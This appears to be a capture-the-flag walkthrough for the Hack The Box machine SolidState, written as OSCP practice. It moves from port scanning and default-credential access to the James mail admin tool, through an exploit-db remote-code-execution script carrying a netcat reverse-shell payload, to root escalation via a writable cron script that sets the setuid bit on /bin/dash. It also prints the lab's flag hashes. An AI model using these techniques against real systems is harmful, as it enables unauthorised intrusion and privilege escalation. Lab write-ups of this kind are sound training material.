Linux Boxes

solidstate

  1. nmap
    1. all ports
  2. port 4555
    1. telnet
    2. listusers
    3. setpassword
  3. port 110 POP
    1. james/no emails
    2. thomas/no emails
    3. mailadmin/no emails
    4. john
      1. email 1
    5. mindy
      1. email 1
      2. email 2
  4. ssh mindy@10.10.10.51
    1. User.txt
  5. james apache server OSI
    1. searchsploit
    2. 35513.py RCE
      1. run
      2. Reverse Shell
  6. privesc
    1. enumeration
      1. LinEnum
        1. report
          1. system
          2. Users/Groups
          3. Environmental
          4. Jobs/Tasks
          5. Networking
          6. Services
          7. Software
          8. Interesting
    2. /opt/temp.py
      1. /tmp/st0ve
      2. add sticky bit to DASH
        1. root.txt
  7. lessons learned

solidstate

images/395-1.png
images/395-2.png

nmap

images/396-1.png
Note
ssh service OpenSSH 7.4p1 is running on port 22
smtp service JAMES smtpd 2.3.2 is running on port 25
tcp service Apache 2.4.25 is running on port 80
pop3 service JAMES pop3d 2.3.2 is running on port 110
nntp service JAMES nntpd is running on port 119

all ports

images/398-1.png

theres a service rsip running on port 4555

port 4555

doing an all-port scan reveals an intersting service on port 4555....
Using default credentials root:root logs us in:

It appears RSIP service is connected to the server's POP service
images/399-1.png
JAMES REMOTE ADMIN TOOL 2.3.2

images/399-2.png

telnet

lets telnet to the rsip service with
telnet 10.10.10.51 4555
images/400-1.png

images/400-2.png

listusers

listusers gives us

images/401-1.png
images/401-2.png

setpassword

we'll reset mindy's password to view her emails with

setpassword <user> <password>
images/402-1.png
be sure to change the password for the other users so we can check their email as well

port 110 POP

We can log into the POP server using the credntials of the users we changed on the James admin tool

images/403-1.png

james/no emails

images/405-1.png
images/405-2.png

No emails from this account

thomas/no emails

images/406-1.png

mailadmin/no emails

images/412-1.png

john

email 1

images/411-1.png

mindy

images/408-1.png

email 1

images/409-1.png

email 2

images/410-1.png
P@55W0rd1!2@ for SSH

ssh mindy@10.10.10.51

images/413-1.png

images/413-2.png

Problem is we are in a restricted Bash (rbash) environment thanks to John so we'll have to escape it somehow...
images/413-3.png

We should search around to see if there are any exploits to James Admin 2.3,2 on google

User.txt

images/414-1.png
images/414-2.png
914d0a4ebc177889b5b89a23f556fd75

james apache server OSI

Lets use google
images/415-1.png

images/415-2.png

images/415-3.png

searchsploit

we have our exploitdb id of the exploit so lets take a look at it on our attack machine
images/417-1.png

35513.py is the same program from our google search, lets move it to our working directory:

images/417-2.png

we can also use
searchsploit -m /exploits/linux/remote/35513.py to copy the exploit

35513.py RCE

Put a reverse shell in the payload to connect back to our attack machine:

payload = nc -e /bin/sh 10.10.10.62 8000
images/418-1.png

run

images/420-1.png

perfect.... just need to log in for our payload to run:
remember mindy's password from her emails were P@55W0rd1!2@
images/420-2.png

Reverse Shell


images/421-1.png

success! lets import a tty shell real fast and we're in business!
python -c ‘import pty;pty.spawn("/bin/bash")’
images/421-2.png

and implement tab autocomplete as well: (use fg for foreground)

ctrl+z to background
stty raw -echo for tab-autocomplete to work on our shell
fg to foreground

images/421-3.png

privesc

enumeration

Lets start with uploading LinEnum to the box: (or lse.sh if you prefer)
images/423-1.png

LinEnum

use wget to download LinEnum onto our victim

wget 10.10.14.62:8001/LinEnum.sh
images/424-1.png

We find from the search there is a world-writeable file called tmp.py we can work with that is OWNED BY ROOT and executeable by anyone!
images/424-2.png

report

Specify -t for thorough scan!

./LinEnum.sh -t
images/425-1.png
images/425-2.png

system

images/426-1.png
images/426-2.png


Users/Groups

images/427-1.png


images/427-2.png
images/427-3.png

images/427-4.png
images/427-5.png

images/427-6.png
images/427-7.png


Environmental

images/428-1.png

images/428-2.png
images/428-3.png
images/428-4.png

Jobs/Tasks

images/429-1.png
images/429-2.png

images/429-3.png

images/429-4.png
images/429-5.png

Networking

images/430-1.png

images/430-2.png

images/430-3.png
images/430-4.png

images/430-5.png

images/430-6.png

images/430-7.png

Services

images/431-1.png

images/431-2.png

Software

images/432-1.png

Interesting

images/433-1.png
images/433-2.png
images/433-3.png
images/433-4.png

images/433-5.png

/opt/temp.py

Checking out the contents of tmp.py
images/434-1.png

we see that touch is installed on the box to utilize:
images/434-2.png

we can rewrite tmp.py with the code:
#!/bin/bash
/usr/bin/touch tmp/st0ve

lets touch the file /tmp/st0ve in /opt/tmp.py to see if we can give the file root permissions:


/tmp/st0ve

we can see we created the file st0ve owned by root with touch program so we know the Cron is running


images/435-1.png

add sticky bit to DASH

we see that Dash is not sim-linked (symbolically linked) to bash on this box which means its a binaryindependent of bash, but more importantly...



DASH does NOT strip the setUID bit like bash does, so if we add setuid bits to DASH we can run it as though we were root!


images/436-1.png



rewriting chmod 4755 /bin/dash to tmp.py to put a sticky-bit on that dash binary as root


images/436-2.png

now simply run /bin/dash and we pop a shell with root privileges!

root.txt

images/437-1.png

b4c9723a28899b1c45db281d99cc87c9

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1962-1.png